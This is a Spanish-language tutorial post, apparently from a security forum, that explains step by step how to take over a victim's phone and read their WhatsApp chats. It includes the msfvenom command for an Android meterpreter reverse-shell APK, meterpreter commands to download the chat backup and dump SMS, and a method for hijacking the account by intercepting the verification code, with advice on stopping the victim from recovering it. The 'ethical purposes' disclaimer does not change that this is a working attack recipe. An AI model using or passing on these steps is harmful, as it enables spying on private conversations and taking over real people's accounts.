¿Es tan seguro whatsapp como dicen?
En este tema voy a explicar como es posible que alguien que tenga acceso a un dispositivo puede descifrar los backups de WhastApp sin necesidad de la clave privada. Antes que nada voy a explicar brevemente unos datos a tener en cuenta:

Cada día, WhatsApp automáticamente guarda tu historial de chats en la memoria de tu teléfono o en una tarjeta de memoria, dependiendo de tus configuraciones, estas sirven para en un momento dado recuperar las conversaciones. Estas crean un archivo con el formato msgstore-AAAA-MM-DD.1.db.crypt12 este esta encriptado mediante una clave, esta clave se genera cada vez que instalamos WhatsApp por lo que solo podremos utilizar esa clave para descifrar los backups creados con ella.


Comenzamos:

Antes de nada, esto esta hecho con fines éticos, no me hago responsable del mal uso de esta guía.

Primero vamos a crear un payload con msfvenom para crear un backdoor en el dispositivo de la víctima.

Código:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=Puerto R > nombre.apk

Ahora vamos a utilizar metasploit framework, ejecutamos:


Código:
msfconsole
Ahora configuramos metasploit con nuestros datos para poder escuchar la petición del payload para conectarnos a la víctima.




Instalamos el payload en el dispositivo android y una vez abierto aparecerá la sesión a la cual nos conectaremos.



Código:
session -i 1
Una vez dentro del dispositivo de la víctima, vamos a ir al directorio de WhatsApp, yo por defecto lo tengo ubicado en la sdcard.




Descargamos la ultima copia, recordad se puede usar cualquiera siempre y cuando se renombre una vez descargada a "msgstore.db.crypt12".



Código:
download msgstore.db.crypt12
Muy bien, ya tenemos la base de datos y acceso al dispositivo de la víctima, solo nos queda descifrar esa base de datos, el si el dispositivo de la víctima tiene permisos root, nos podemos saltar todo este paso hasta donde explico como obtener la clave privada.

Utilizamos un segundo dispositivo en el que instalaremos WhatsApp, en mi caso utilizaré un emulador de android cual tiene permisos de root para luego importar la copia de seguridad
Ahora, pasamos la base de datos a vuestro dispositivo a la carpeta Databases, esta esta dentro de la carpeta WhatsApp. (Si no aparece se crea)




Muy bien, ahora abrimos WhatsApp introducimos el numero de la victima, esto hará que le llegue un mensaje a la vicitma. (Problema: La victima se puede dar cuenta del mensaje recibido, pero, ¿Que pasa si la victima no esta atento al dispositivo en ese momento?)




Volvemos al metasploit, descargamos los sms y lo abrimos con un editor de texto, yo utilizaré nano.

Código:
dump_sms




Ya tenemos el código de verificación. Ahora solo queda restaurar.







Una vez terminado de restaurar, esperamos a que nos salga los chats de WhatsApp y importante desconectar el Wifi para evitar que la victima restablezca el WhatsApp y nos corten la conexión con el servidor, ya que no se puede utilizar una cuenta en mas de un dispositivo.




Bueno, ya tenemos las conversaciones pero ahora las queremos importar para guardarlas.
Vamos a hacer una copia de seguridad con WhatApp para encriptar de nuevo esas conversaciones con la clave que se ha generado al instalar WhatsApp.




Ahora, localizamos la clave (esta se encuentra en "/data/data/com.whatsapp/files") y la nueva copia de seguridad creada.





Muy bien, ya está todo solo nos queda abrir la base de datos con WhastApp Viewer https://github.com/andreas-mausch/whatsapp-viewer/releases



Esto generará una base de datos la cual la volveremos abrir con WhatsApp Viewer



y ya esta!! Ya tendríamos las conversaciones de WhastApp de la víctima.




Un saludo, Eryos. (para ElLadoDelMal)